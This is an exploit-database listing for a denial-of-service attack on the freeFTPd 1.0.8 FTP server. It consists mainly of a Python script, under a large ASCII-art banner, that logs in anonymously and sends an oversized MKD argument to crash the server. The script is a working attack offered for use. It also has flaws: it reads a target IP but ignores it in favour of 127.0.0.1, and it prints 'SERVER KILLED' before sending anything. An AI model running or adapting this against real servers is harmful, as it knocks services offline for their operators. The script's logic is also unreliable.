freeFTPd 1.0.8 - 'mkd' Command Denial Of Service



EKU-ID: 5974 CVE: OSVDB-ID:
Author: ScrR1pTK1dd13 Published: 2016-11-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


from ftplib import FTP
 
print '''
 
 
                               `,;'++';,`                                     
                          `'++++++++++++++++;`                                
                       .+++++++++++++++++++++++'`                             
                     ;++++++:`            `:++++++:                           
                   '++++'`   , +`. :; .``     .'++++;                         
                 :++++,  '+ `+.+.+`+':+:+ +:` +  :++++,                       
                ++++,    `+  +`+.+`+':+.+ +:'.+.   :++++                      
              ,+++;       +` +:':+`+',+`+,++.+:+ +,  '+++.                    
             '+++`  `++   ;+ ,+:'; ,: ;;+`++ +.+`+.   `+++;                   
            +++;  `: ++'   +      '+++   :++;++,+:  +   '+++                  
           +++,   ++' ,+       .;+++++',`     : +  ',+   :+++                 
          +++` ++ +:+ +:   .+++++++++++++++;    :  ++'+,,`,+++                
         +++`  `+;.+'`   '++++++++++++++++++++.   ;+;+:.+` .+++               
        '++`  ++ +,.`  '++++++++++++++++++++++++.   +;.+`+  ,++;              
       :++,  +:++`'  ,+++++++++++++''++++++++++++    `+.+:   :++.             
       ++;  . +:+:  +++++++++'.          `;++++++++.  .+' ++  +++             
      +++  ;++ +:  ++++++++,                .+++++++;  ;:+;+   +++            
     :++  ;+,++  `+++++++,                    `++++++'  +,+,.+ `++.           
     ++: `+`+'.  ++++++'                        ;+++++'  +`;++  '++           
    '++   ,+,'  ++++++,                          .+++++;  ++     ++:          
    ++.   ' +  ++++++`                             +++++. `   '+.:++          
   ;++ +; +   ;+++++`                               +++++   :++ ; ++:         
   ++, '++   `+++++,                                `+++++  +` `. :++         
  ,++  ` ;+: +++++'                                  :++++`    ,+  ++`        
  ++; .+++` .+++++                                    +++++  '++:: ++'        
  ++` ;+':: +++++.                                     ++++` '`+++`.++        
 .++   `++  +++++                                      '++++  +:    ++`       
 '++ `++;  '++++`                                       ++++        ++;       
 ++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++:    
 ++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
 ++ +;,`  ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++:
;++  `.,.                                                                 +++++
+++       '..':         ,++'`              ,+++`                          `++++
+++  +;+` ++++:        ++++++'            ++++++'                          ++++
+++ :.'`; ++++:       ++`   :+,          ++`   ,+:                         ++++
'++ `+++. ++++;       :       +          :       +                        ,++++
;++    :` ++++'                                                          `+++++
,++ `+;;+ +++++  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  :;;;;;;;;;;;;;;++++++.
`++  ++,+ +++++  :+++++++++++++++++++++++++++++++++++++  ++++++++++++++++++++'
 ++  ` `, ;++++   ++++++++++++++++++++++++++++++++++++:  ++++++++++++++++++++ 
 ++` .+++.`++++:  ++++++++++++++++++++++++++++++++++++  `++++++++++++++++++,  
 ++: ','+: +++++  :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++  ++++:,:,,:,,+++,.     
 ;++  +:`, '++++`  +++++.                       +++++`  ++++  '.+'  ++,       
  ++   +++  +++++  :+++++                      ++++++  ;++++  ++.+  ++        
  ++, ';`+' +++++`  ++++++                    ++++++   ++++` +  +. :++        
  '++ :++;, .+++++   ++++++`                 ++++++,  +++++        ++:        
  `++ +` :+, +++++:  .++++++'              :++++++;  .++++. +`    `++         
   ++' ;++`  `+++++`  ,+++++++'`         :+++++++;   +++++  :++`  +++         
   ,++ ,:   + '+++++   .++++++++++';:;++++++++++:   +++++     ;+' ++`         
    +++   :+'  ++++++    ++++++++++++++++++++++`   +++++. ;+` ,  +++          
    ,++ :++`;+` ++++++`   :++++++++++++++++++'    +++++' `+,+;`;`++.          
     +++ : ++.+ `++++++:    :++++++++++++++;    ,+++++'   ++`+  +++           
     `++,  +;+`  `+++++++`    `:++++++++:`     ++++++' ++  ,+; ;++`           
      '++  :+  `'  ++++++++`                `+++++++;  +++   ;`++;            
       +++    `:`+  +++++++++:            ,++++++++,   +,++   +++             
        +++   +++;'  :+++++++++++';::;'+++++++++++   ;+ +,'  +++              
        ,+++  +++.+.:  +++++++++++++++++++++++++.  '' ++ +  +++`              
         ;++'  ` +`+`;. `+++++++++++++++++++++,   :,+,:+:  +++,               
          ;+++  ,++:'++`   ,+++++++++++++++;    ++ .++ `  +++:                
           ;+++   + +`+  +;    .;'++++':`     ++.+':++   +++:                 
            :+++`  `++, :;+`+;            ::+ +,+`+.   .+++,                  
             .+++'  `,   +`:'+ +,+` +, +:+.++:';+ ++  ++++`                   
               ++++.    +':++: +;+` ': +:+ +.+ +'   :++++                     
                :++++.   . +,+,;+'` '; :'+`+'+    ,++++,                      
                  +++++:    ` +`+'` '; `++`     ;++++'                        
                   `++++++:         ;'  +    :++++++`                         
                     `+++++++':.       `,:+++++++'                            
                        .++++++++++++++++++++++.                              
                           `:'++++++++++++',                                  
 
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   #
                ##############################################
 
 
# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit
# Date: 2016.10.30
# Exploit Author: Greg Priest
# Version: FreeFTPD_1.0.8
# Tested on: Windows XP, Windows 7 x64
 
'''
 
ftp_ip = raw_input("FTP server IP:")
killerstring = 'A' * 500
ftp = FTP('127.0.0.1')
ftp.login('anonymous', 'h4ck3r@h4ck3r.net')
print ftp.login
print "SERVER KILLED"
FTP.mkd(ftp, killerstring)